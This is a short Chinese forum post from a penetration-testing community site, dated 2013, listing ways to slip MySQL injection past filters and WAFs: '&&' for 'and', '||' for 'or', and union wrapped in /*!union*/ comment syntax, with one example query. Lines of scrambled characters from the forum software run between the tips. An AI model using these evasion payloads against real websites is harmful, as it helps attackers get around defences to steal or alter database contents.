中国网络渗透测试联盟
标题:
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
[打印本页]
作者:
admin
时间:
2013-2-23 12:41
标题:
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
1.and 用&& 代替
4 _3 A- |, H* c' x8 V1 ~3 x* h+ n
7 @9 _: F1 ^7 k
2. or 用||代替
: }3 x/ I+ M& i. G9 r1 K7 n8 d1 Z8 Q
% ^& Y3 l& J) g9 Z( }/ O
3.union select from 变成 /*!union*/这种。
; J5 Z$ \& {) ?2 S/ Z: V5 a0 E
8 g6 Z" @" z K8 Z, h
一个例子:
+ @0 l3 R P& k- Y4 H
* J) t, h! F t3 \2 k" l, i
/ select 1 /*!union*/ select 2 from adad where 1&&1
, f9 A/ A/ E6 N G0 L: I0 x" z
$ v/ j1 q2 M: N0 O
摘自 it_security
9 l: u4 r% i( M9 ]+ i& k4 k
4 B/ A; k& a2 U+ @
绕过waf的一个思路
) C8 o( R' p& m- H Z
5 `1 j* A: t. z$ }8 R* y% l' w3 U0 F
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2